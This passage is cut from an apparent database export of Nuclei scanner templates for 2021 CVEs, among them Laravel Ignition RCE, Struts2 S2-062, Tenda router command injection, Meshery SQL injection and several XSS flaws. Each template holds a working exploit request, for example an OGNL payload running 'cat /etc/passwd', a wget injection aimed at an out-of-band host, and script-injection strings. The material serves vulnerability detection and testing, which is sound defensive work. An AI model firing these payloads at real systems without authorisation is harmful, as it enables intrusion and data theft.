490a00463044022079123fdae879b637f0e9fb80ff3f14cd52ea536bb21973d4e6c42e424732e1a60220569e530531fa3d07ffc1a9a0b5e334557b3ef103999048a2f5b1dd3ff6d64376:922c64590222798bb761d5b6d8e72950", "hash": "6d8b13b049d27107b77dfed030a3e0f6", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30834b" }, "name": "CVE-2021-3129.yaml", "content": "id: CVE-2021-3129\n\ninfo:\n name: Laravel with Ignition <= v8.4.2 Debug Mode - Remote Code Execution\n author: z3bd,pdteam\n severity: critical\n description: Laravel version 8.4.2 and before with Ignition before 2.5.2 allows unauthenticated remote attackers to execute arbitrary code because of insecure usage of file_get_contents() and file_put_contents(). This is exploitable on sites using debug mode with Laravel before 8.4.2.\n impact: |\n Successful exploitation of this vulnerability can lead to remote code execution, potentially allowing an attacker to take control of the affected system.\n remediation: |\n Upgrade Laravel to version 8.4.3 or higher to mitigate this vulnerability.\n reference:\n - https://www.ambionics.io/blog/laravel-debug-rce\n - https://github.com/vulhub/vulhub/tree/master/laravel/CVE-2021-3129\n - https://nvd.nist.gov/vuln/detail/CVE-2021-3129\n - https://github.com/facade/ignition/pull/334\n - https://github.com/d4n-sec/d4n-sec.github.io\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-3129\n epss-score: 0.97468\n epss-percentile: 0.99958\n cpe: cpe:2.3:a:facade:ignition:*:*:*:*:*:laravel:*:*\n metadata:\n max-request: 6\n vendor: facade\n product: ignition\n framework: laravel\n tags: cve2021,cve,laravel,rce,vulhub,kev,facade\n\nhttp:\n - raw:\n - |\n POST /_ignition/execute-solution HTTP/1.1\n Host: {{Hostname}}\n Accept: application/json\n Content-Type: application/json\n\n {\"solution\": \"Facade\\\\Ignition\\\\Solutions\\\\MakeViewVariableOptionalSolution\", \"parameters\": {\"variableName\": \"cve20213129\", \"viewFile\": \"php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log\"}}\n - |\n POST /_ignition/execute-solution HTTP/1.1\n Host: {{Hostname}}\n Accept: application/json\n Content-Type: application/json\n\n {\"solution\": \"Facade\\\\Ignition\\\\Solutions\\\\MakeViewVariableOptionalSolution\", \"parameters\": {\"variableName\": \"cve20213129\", \"viewFile\": \"php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log\"}}\n - |\n POST /_ignition/execute-solution HTTP/1.1\n Host: {{Hostname}}\n Accept: application/json\n Content-Type: application/json\n\n {\"solution\": \"Facade\\\\Ignition\\\\Solutions\\\\MakeViewVariableOptionalSolution\", \"parameters\": {\"variableName\": \"cve20213129\", \"viewFile\": \"AA\"}}\n - |\n POST /_ignition/execute-solution HTTP/1.1\n Host: {{Hostname}}\n Accept: application/json\n Content-Type: application/json\n\n {\"solution\": \"Facade\\\\Ignition\\\\Solutions\\\\MakeViewVariableOptionalSolution\", \"parameters\": {\"variableName\": \"cve20213129\", \"viewFile\": \"=50=00=44=00=39=00=77=00=61=00=48=00=41=00=67=00=58=00=31=00=39=00=49=00=51=00=55=00=78=00=55=00=58=00=30=00=4E=00=50=00=54=00=56=00=42=00=4A=00=54=00=45=00=56=00=53=00=4B=00=43=00=6B=00=37=00=49=00=44=00=38=00=2B=00=44=00=51=00=6F=00=4C=00=41=00=51=00=41=00=41=00=41=00=67=00=41=00=41=00=41=00=42=00=45=00=41=00=41=00=41=00=41=00=42=00=41=00=41=00=41=00=41=00=41=00=41=00=43=00=7A=00=41=00=41=00=41=00=41=00=54=00=7A=00=6F=00=30=00=4D=00=44=00=6F=00=69=00=53=00=57=00=78=00=73=00=64=00=57=00=31=00=70=00=62=00=6D=00=46=00=30=00=5A=00=56=00=78=00=43=00=63=00=6D=00=39=00=68=00=5A=00=47=00=4E=00=68=00=63=00=33=00=52=00=70=00=62=00=6D=00=64=00=63=00=55=00=47=00=56=00=75=00=5A=00=47=00=6C=00=75=00=5A=00=30=00=4A=00=79=00=62=00=32=00=46=00=6B=00=59=00=32=00=46=00=7A=00=64=00=43=00=49=00=36=00=4D=00=6A=00=70=00=37=00=63=00=7A=00=6F=00=35=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=6C=00=64=00=6D=00=56=00=75=00=64=00=48=00=4D=00=69=00=4F=00=30=00=38=00=36=00=4D=00=7A=00=45=00=36=00=49=00=6B=00=6C=00=73=00=62=00=48=00=56=00=74=00=61=00=57=00=35=00=68=00=64=00=47=00=56=00=63=00=56=00=6D=00=46=00=73=00=61=00=57=00=52=00=68=00=64=00=47=00=6C=00=76=00=62=00=6C=00=78=00=57=00=59=00=57=00=78=00=70=00=5A=00=47=00=46=00=30=00=62=00=33=00=49=00=69=00=4F=00=6A=00=45=00=36=00=65=00=33=00=4D=00=36=00=4D=00=54=00=41=00=36=00=49=00=6D=00=56=00=34=00=64=00=47=00=56=00=75=00=63=00=32=00=6C=00=76=00=62=00=6E=00=4D=00=69=00=4F=00=32=00=45=00=36=00=4D=00=54=00=70=00=37=00=63=00=7A=00=6F=00=77=00=4F=00=69=00=49=00=69=00=4F=00=33=00=4D=00=36=00=4E=00=6A=00=6F=00=69=00=63=00=33=00=6C=00=7A=00=64=00=47=00=56=00=74=00=49=00=6A=00=74=00=39=00=66=00=58=00=4D=00=36=00=4F=00=44=00=6F=00=69=00=41=00=43=00=6F=00=41=00=5A=00=58=00=5A=00=6C=00=62=00=6E=00=51=00=69=00=4F=00=33=00=4D=00=36=00=4D=00=6A=00=6F=00=69=00=61=00=57=00=51=00=69=00=4F=00=33=00=30=00=46=00=41=00=41=00=41=00=41=00=5A=00=48=00=56=00=74=00=62=00=58=00=6B=00=45=00=41=00=41=00=41=00=41=00=58=00=73=00=7A=00=6F=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=49=00=41=00=41=00=41=00=41=00=64=00=47=00=56=00=7A=00=64=00=43=00=35=00=30=00=65=00=48=00=51=00=45=00=41=00=41=00=41=00=41=00=58=00=73=00=7A=00=6F=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=43=00=7A=00=64=00=47=00=56=00=7A=00=64=00=48=00=52=00=6C=00=63=00=33=00=51=00=63=00=4A=00=39=00=59=00=36=00=5A=00=6B=00=50=00=61=00=39=00=61=00=45=00=49=00=51=00=49=00=45=00=47=00=30=00=6B=00=4A=00=2B=00=39=00=4A=00=50=00=6B=00=4C=00=67=00=49=00=41=00=41=00=41=00=42=00=48=00=51=00=6B=00=31=00=43=00a\"}}\n - |\n POST /_ignition/execute-solution HTTP/1.1\n Host: {{Hostname}}\n Accept: application/json\n Content-Type: application/json\n\n {\"solution\": \"Facade\\\\Ignition\\\\Solutions\\\\MakeViewVariableOptionalSolution\", \"parameters\": {\"variableName\": \"cve20213129\", \"viewFile\": \"php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log\"}}\n - |\n POST /_ignition/execute-solution HTTP/1.1\n Host: {{Hostname}}\n Accept: application/json\n Content-Type: application/json\n\n {\"solution\": \"Facade\\\\Ignition\\\\Solutions\\\\MakeViewVariableOptionalSolution\", \"parameters\": {\"variableName\": \"cve20213129\", \"viewFile\": \"phar://../storage/logs/laravel.log/test.txt\"}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"uid=\"\n - \"gid=\"\n - \"groups=\"\n - \"Illuminate\"\n condition: and\n\n - type: status\n status:\n - 500\n\n extractors:\n - type: regex\n regex:\n - \"(u|g)id=.*\"\n# digest: 490a0046304402205d2d40971acbffaccca7916ae65339dd25b3b3176b5f0da6e1e552afae33f0f6022009d0e75478ce655b009e77c18c2b19b3dec3fb49e155e93b7f5bafb2f58c2f4c:922c64590222798bb761d5b6d8e72950", "hash": "b52bc0ce89310a4fb9d0d913b28b1fc8", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30834c" }, "name": "CVE-2021-31537.yaml", "content": "id: CVE-2021-31537\n\ninfo:\n name: SIS Informatik REWE GO SP17 <7.7 - Cross-Site Scripting\n author: geeknik\n severity: medium\n description: SIS Informatik REWE GO SP17 before 7.7 contains a cross-site scripting vulnerability via rewe/prod/web/index.php (affected parameters are config, version, win, db, pwd, and user) and /rewe/prod/web/rewe_go_check.php (version and all other parameters).\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n To remediate this issue, ensure that all user-supplied input is properly validated and sanitized before being displayed on web pages.\n reference:\n - https://sec-consult.com/vulnerability-lab/advisory/reflected-xss-sis-infromatik-rewe-go-cve-2021-31537/\n - http://seclists.org/fulldisclosure/2021/May/20\n - https://sisinformatik.com/rewe-go/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-31537\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-31537\n cwe-id: CWE-79\n epss-score: 0.00355\n epss-percentile: 0.71454\n cpe: cpe:2.3:a:sisinformatik:sis-rewe_go:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: sisinformatik\n product: sis-rewe_go\n tags: cve2021,cve,xss,seclists,intrusive,sisinformatik\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/rewe/prod/web/rewe_go_check.php?config=rewe&version=7.5.0%3cscript%3econfirm({{randstr}})%3c%2fscript%3e&win=2707\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \n - SIS-REWE\n condition: and\n\n - type: word\n part: header\n words:\n - text/html\n# digest: 490a0046304402204da43b60754d42852c0d693d43abcf91056309cafe0f417a0617d01a0f0ae6e502205bcbba054b716ae69bf7c9187fa6ff4c3ab2fb69bfe3a240d82721db8221ff5a:922c64590222798bb761d5b6d8e72950", "hash": "1f8d3793f860003504040207f4cc4f9b", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30834d" }, "name": "CVE-2021-31581.yaml", "content": "id: CVE-2021-31581\n\ninfo:\n name: Akkadian Provisioning Manager - Information Disclosure\n author: geeknik\n severity: medium\n description: Akkadian Provisioning Manager is susceptible to information disclosure. The restricted shell provided can be escaped by abusing the Edit MySQL Configuration command. This command launches a standard VI editor interface which can then be escaped.\n impact: |\n An attacker can exploit this vulnerability to access sensitive information, such as user credentials or system configuration details.\n remediation: This issue was resolved in Akkadian OVA appliance version 3.0 and later, Akkadian Provisioning Manager 5.0.2 and later, and Akkadian Appliance Manager 3.3.0.314-4a349e0 and later.\n reference:\n - https://threatpost.com/unpatched-bugs-provisioning-cisco-uc/166882/\n - https://www.rapid7.com/blog/post/2021/06/08/akkadian-provisioning-manager-multiple-vulnerabilities-disclosure/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-31581\n classification:\n cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 4.4\n cve-id: CVE-2021-31581\n cwe-id: CWE-312,CWE-269\n epss-score: 0.00285\n epss-percentile: 0.65373\n cpe: cpe:2.3:a:akkadianlabs:ova_appliance:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: akkadianlabs\n product: ova_appliance\n tags: cve,cve2021,akkadian,mariadb,disclosure,akkadianlabs\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/pme/database/pme/phinx.yml\"\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"host:\"\n - \"name:\"\n - \"pass:\"\n condition: and\n\n - type: word\n negative: true\n words:\n - \"html>\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100c618c0c706f90ae263dca7f791eea7727f5208a02ff97a620dcdd3f48789bb41022100ae5d555a29e8c87d665ceaff0e8dae13667c2586e6402cb9b17e8e458f7dc467:922c64590222798bb761d5b6d8e72950", "hash": "9ebdae3a0f0bc82286a3ab5721b58762", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30834e" }, "name": "CVE-2021-31589.yaml", "content": "id: CVE-2021-31589\n\ninfo:\n name: BeyondTrust Secure Remote Access Base <=6.0.1 - Cross-Site Scripting\n author: Ahmed Abou-Ela\n severity: medium\n description: BeyondTrust Secure Remote Access Base through 6.0.1 contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, data theft, or defacement.\n remediation: |\n Upgrade to a patched version of BeyondTrust Secure Remote Access Base (6.0.2 or higher) that addresses the XSS vulnerability.\n reference:\n - https://packetstormsecurity.com/files/165408\n - https://cxsecurity.com/issue/WLB-2022010013\n - https://beyondtrustcorp.service-now.com/csm?sys_kb_id=922d0ab31bc1b490e73854ae034bcb7b&id=kb_article_view&sysparm_rank=1&sysparm_tsqueryId=64fc14ffdb8f70d422725385ca9619cb\n - https://www.beyondtrust.com/docs/release-notes/index.htm\n - https://nvd.nist.gov/vuln/detail/CVE-2021-31589\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-31589\n cwe-id: CWE-79\n epss-score: 0.00286\n epss-percentile: 0.65537\n cpe: cpe:2.3:o:beyondtrust:appliance_base_software:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: beyondtrust\n product: appliance_base_software\n shodan-query: 'set-cookie: nsbase_session'\n google-query: '\"BeyondTrust\" \"Redistribution Prohibited\"'\n tags: cve,cve2021,xss,packetstorm,beyondtrust,bomgar\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/appliance/login.ns?login%5Bpassword%5D=test%22%3E%3Csvg/onload=alert(document.domain)%3E&login%5Buse_curr%5D=1&login%5Bsubmit%5D=Change%20Password\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - ''\n - 'bomgar'\n case-insensitive: true\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022068d41164ba855a2600f7fcfeb4d98a1ede131baf6cf5bae9be7f37e595bfe786022023c4b711bf8091b7d6c996aa06fc134a97a34eefab9dfeae693d6ac7e3061bd1:922c64590222798bb761d5b6d8e72950", "hash": "856aa1d7c80ef855ec4e9f67c3a3bd38", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30834f" }, "name": "CVE-2021-31602.yaml", "content": "id: CVE-2021-31602\n\ninfo:\n name: Hitachi Vantara Pentaho/Business Intelligence Server - Authentication Bypass\n author: pussycat0x\n severity: high\n description: Hitachi Vantara Pentaho through 9.1 and Pentaho Business Intelligence Server through 7.x are vulnerable to authentication bypass. The Security Model has different layers of Access Control. One of these layers is the applicationContext security, which is defined in the applicationContext-spring-security.xml file. The default configuration allows an unauthenticated user with no previous knowledge of the platform settings to extract pieces of information without possessing valid credentials.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to bypass authentication and gain unauthorized access to the server.\n remediation: |\n Apply the latest security patches or updates provided by Hitachi Vantara to fix the authentication bypass vulnerability.\n reference:\n - https://seclists.org/fulldisclosure/2021/Nov/13\n - https://portswigger.net/daily-swig/remote-code-execution-sql-injection-bugs-uncovered-in-pentaho-business-analytics-software\n - https://hawsec.com/publications/pentaho/HVPENT210401-Pentaho-BA-Security-Assessment-Report-v1_1.pdf\n - https://www.hitachi.com/hirt/security/index.html\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31602\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2021-31602\n cwe-id: CWE-287\n epss-score: 0.36115\n epss-percentile: 0.97042\n cpe: cpe:2.3:a:hitachi:vantara_pentaho:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: hitachi\n product: vantara_pentaho\n shodan-query: Pentaho\n tags: cve2021,cve,spring,seclists,pentaho,auth-bypass,hitachi\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/pentaho/api/userrolelist/systemRoles?require-cfg.js\"\n - \"{{BaseURL}}/api/userrolelist/systemRoles?require-cfg.js\"\n\n stop-at-first-match: true\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - ''\n - 'Anonymous'\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100b35315666af836eb0d1c0cb629dcaa9244de7f8bef62b0d942503cd51f77f79a02203a67df731f946a044f7dd7a2137b3fbcc76a48fd94edd78b8ef4ed6f2300d002:922c64590222798bb761d5b6d8e72950", "hash": "95bb560161575b8e6d0299666182ebe5", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308350" }, "name": "CVE-2021-31682.yaml", "content": "id: CVE-2021-31682\n\ninfo:\n name: WebCTRL OEM <= 6.5 - Cross-Site Scripting\n author: gy741,dhiyaneshDk\n severity: medium\n description: WebCTRL OEM 6.5 and prior is susceptible to a cross-site scripting vulnerability because the login portal does not sanitize the operatorlocale GET parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in a victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade to a patched version of WebCTRL OEM that addresses the XSS vulnerability (CVE-2021-31682).\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2021-31682\n - https://github.com/3ndG4me/WebCTRL-OperatorLocale-Parameter-Reflected-XSS\n - https://www.automatedlogic.com/en/products-services/webctrl-building-automation-system/\n - http://packetstormsecurity.com/files/164707/WebCTRL-OEM-6.5-Cross-Site-Scripting.html\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-31682\n cwe-id: CWE-79\n epss-score: 0.01492\n epss-percentile: 0.86569\n cpe: cpe:2.3:a:automatedlogic:webctrl:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: automatedlogic\n product: webctrl\n shodan-query: html:\"/_common/lvl5/dologin.jsp\"\n tags: cve2021,cve,webctrl,xss,packetstorm,automatedlogic\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/index.jsp?operatorlocale=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '\">'\n - 'common/lvl5'\n condition: and\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022045824ff16ba16cb21de7b21e60ac029eb7fda55842dad99fc023a5ee7f91376e02201d497628c7f2ade3b6b6b9dcf46184a710305a6d3461abb2b4ef0e4d643ca3f9:922c64590222798bb761d5b6d8e72950", "hash": "919571e0d8d72c753d2929278a634f6a", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308351" }, "name": "CVE-2021-31755.yaml", "content": "id: CVE-2021-31755\n\ninfo:\n name: Tenda Router AC11 - Remote Command Injection\n author: gy741\n severity: critical\n description: Tenda Router AC11 is susceptible to remote command injection vulnerabilities in the web-based management interface that could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.\n impact: |\n Successful exploitation of this vulnerability could lead to unauthorized access, data exfiltration, and complete compromise of the affected router.\n remediation: |\n Apply the latest firmware update provided by Tenda to fix the remote command injection vulnerability (CVE-2021-31755).\n reference:\n - https://github.com/Yu3H0/IoT_CVE/tree/main/Tenda/CVE_3\n - https://www.fortinet.com/blog/threat-research/the-ghosts-of-mirai\n - https://nvd.nist.gov/vuln/detail/CVE-2021-31755\n - https://github.com/Ostorlab/known_exploited_vulnerbilities_detectors\n - https://github.com/Yu3H0/IoT_CVE\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-31755\n cwe-id: CWE-787\n epss-score: 0.96978\n epss-percentile: 0.99717\n cpe: cpe:2.3:o:tenda:ac11_firmware:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: tenda\n product: ac11_firmware\n tags: cve2021,cve,tenda,rce,oast,router,mirai,kev\n\nhttp:\n - raw:\n - |\n POST /goform/setmac HTTP/1.1\n Host: {{Hostname}}\n Origin: {{BaseURL}}\n Referer: {{BaseURL}}/index.htmlr\n Content-Type: application/x-www-form-urlencoded\n\n module1=wifiBasicCfg&doubleBandUnityEnable=false&wifiTotalEn=true&wifiEn=true&wifiSSID=Tenda_B0E040&mac=wget+http://{{interactsh-url}}&wifiSecurityMode=WPAWPA2%2FAES&wifiPwd=Password12345&wifiHideSSID=false&wifiEn_5G=true&wifiSSID_5G=Tenda_B0E040_5G&wifiSecurityMode_5G=WPAWPA2%2FAES&wifiPwd_5G=Password12345&wifiHideSSID_5G=false&module2=wifiGuest&guestEn=false&guestEn_5G=false&guestSSID=Tenda_VIP&guestSSID_5G=Tenda_VIP_5G&guestPwd=&guestPwd_5G=&guestValidTime=8&guestShareSpeed=0&module3=wifiPower&wifiPower=high&wifiPower_5G=high&module5=wifiAdvCfg&wifiMode=bgn&wifiChannel=auto&wifiBandwidth=auto&wifiMode_5G=ac&wifiChannel_5G=auto&wifiBandwidth_5G=auto&wifiAntijamEn=false&module6=wifiBeamforming&wifiBeaformingEn=true&module7=wifiWPS&wpsEn=true&wanType=static\n\n matchers:\n - type: word\n part: interactsh_protocol # Confirms the HTTP Interaction\n words:\n - \"http\"\n# digest: 4a0a00473045022024dea9a3df7016acc7f7259f997886586c771dce081949605bfc5a966edd61ac022100dbed0c4ff5dca2ef9cc708946e75516b5994715572b6dbe6f3e4c8479cdb8c8c:922c64590222798bb761d5b6d8e72950", "hash": "7e588f37a852a3fa70d2c4a4ef8c490e", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308352" }, "name": "CVE-2021-31805.yaml", "content": "id: CVE-2021-31805\n\ninfo:\n name: Apache Struts2 S2-062 - Remote Code Execution\n author: taielab\n severity: critical\n description: Apache Struts2 S2-062 is vulnerable to remote code execution. The fix issued for CVE-2020-17530 (S2-061) was incomplete, meaning some of the tag's attributes could still perform a double evaluation if a developer applied forced OGNL evaluation by using the %{...} syntax.\n impact: |\n Remote code execution\n remediation: Avoid using forced OGNL evaluation on untrusted user input, and/or upgrade to Struts 2.5.30 or greater which checks if expression evaluation won't lead to the double evaluation.\n reference:\n - https://cwiki.apache.org/confluence/display/WW/S2-062\n - https://github.com/Axx8/Struts2_S2-062_CVE-2021-31805\n - https://nvd.nist.gov/vuln/detail/CVE-2021-31805\n - http://www.openwall.com/lists/oss-security/2022/04/12/6\n - https://security.netapp.com/advisory/ntap-20220420-0001/\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-31805\n cwe-id: CWE-917\n epss-score: 0.18558\n epss-percentile: 0.961\n cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: apache\n product: struts\n tags: cve2021,cve,apache,rce,struts,struts2,intrusive\n\nhttp:\n - raw:\n - |\n POST / HTTP/1.1\n Host: {{Hostname}}\n Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryl7d1B1aGsV2wcZwF\n Content-Length: 1095\n\n ------WebKitFormBoundaryl7d1B1aGsV2wcZwF\n Content-Disposition: form-data; name=\"id\"\n\n %{\n (#request.map=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +\n (#request.map.setBean(#request.get('struts.valueStack')) == true).toString().substring(0,0) +\n (#request.map2=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +\n (#request.map2.setBean(#request.get('map').get('context')) == true).toString().substring(0,0) +\n (#request.map3=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +\n (#request.map3.setBean(#request.get('map2').get('memberAccess')) == true).toString().substring(0,0) +\n (#request.get('map3').put('excludedPackageNames',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) +\n (#request.get('map3').put('excludedClasses',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) +\n (#application.get('org.apache.tomcat.InstanceManager').newInstance('freemarker.template.utility.Execute').exec({'cat /etc/passwd'}))\n }\n\n ------WebKitFormBoundaryl7d1B1aGsV2wcZwF—\n\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n# digest: 4a0a0047304502210099350b0b9e08a8c89bba1fb6dcfd7cc4a0a7a0220ffb6f74b0da393d51d218e90220480b82d744ec40d5ac5a7a57b6067c4579ba4fb210ad395f4b4a253cd802293c:922c64590222798bb761d5b6d8e72950", "hash": "6e580d8f8d8a6903a4869b829c1e817e", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308353" }, "name": "CVE-2021-31856.yaml", "content": "id: CVE-2021-31856\n\ninfo:\n name: Layer5 Meshery 0.5.2 - SQL Injection\n author: princechaddha\n severity: critical\n description: Layer5 Meshery 0.5.2 contains a SQL injection vulnerability in the REST API that allows an attacker to execute arbitrary SQL commands via the /experimental/patternfiles endpoint (order parameter in GetMesheryPatterns in models/meshery_pattern_persister.go).\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: |\n Upgrade to a patched version of Layer5 Meshery or apply the necessary security patches to mitigate the SQL Injection vulnerability (CVE-2021-31856).\n reference:\n - https://github.com/ssst0n3/CVE-2021-31856\n - https://nvd.nist.gov/vuln/detail/CVE-2021-31856\n - https://meshery.io\n - https://github.com/layer5io/meshery/pull/2745\n - https://github.com/ssst0n3/my_vulnerabilities\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-31856\n cwe-id: CWE-89\n epss-score: 0.03274\n epss-percentile: 0.91056\n cpe: cpe:2.3:a:layer5:meshery:0.5.2:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: layer5\n product: meshery\n tags: cve2021,cve,sqli,layer5\nvariables:\n num: \"999999999\"\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/api/experimental/patternfile?order=id%3Bselect(md5({{num}}))&page=0&page_size=0\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '{{md5({{num}})}}'\n\n - type: status\n status:\n - 200\n# digest: 4b0a004830460221008282dd3dc0af4d7274665fcf07634a48fd7173a214d41c5e21e649c77c019c4e022100d945931cb64b065349eb9de7b7d95b3e6801dc81a762c39998d8215c3d7a6bb9:922c64590222798bb761d5b6d8e72950", "hash": "8e5e1608d663a4450eb92e8005dd76a2", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308354" }, "name": "CVE-2021-31862.yaml", "content": "id: CVE-2021-31862\n\ninfo:\n name: SysAid 20.4.74 - Cross-Site Scripting\n author: jas37\n severity: medium\n description: SysAid 20.4.74 contains a reflected cross-site scripting vulnerability via the KeepAlive.jsp stamp parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade to a patched version of SysAid or apply the vendor-provided security patch to mitigate the XSS vulnerability.\n reference:\n - https://github.com/RobertDra/CVE-2021-31862/blob/main/README.md\n - https://www.sysaid.com/product/on-premise/latest-release\n - https://nvd.nist.gov/vuln/detail/CVE-2021-31862\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-31862\n cwe-id: CWE-79\n epss-score: 0.00141\n epss-percentile: 0.48947\n cpe: cpe:2.3:a:sysaid:sysaid:20.4.74:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: sysaid\n product: sysaid\n tags: cve2021,cve,xss,sysaid\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/KeepAlive.jsp?stamp=%3Cscript%3Ealert(document.domain)%3C/script%3E'\n\n matchers:\n - type: dsl\n dsl:\n - '(body == \"false \")'\n - 'status_code == 200'\n condition: and\n# digest: 490a004630440220695d58cf0fd21f4c1d710467e6b21c1e233c8de8bafe4a76b86ee296c287fa2a02205bc6ca3e58157209e19f18fbea88fdb9fd57c43fc67a858599a23a5186cceec2:922c64590222798bb761d5b6d8e72950", "hash": "a92be894c2d40644875baebc15bdd33c", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308355" }, "name": "CVE-2021-32030.yaml", "content": "id: CVE-2021-32030\n\ninfo:\n name: ASUS GT-AC2900 - Authentication Bypass\n author: gy741\n 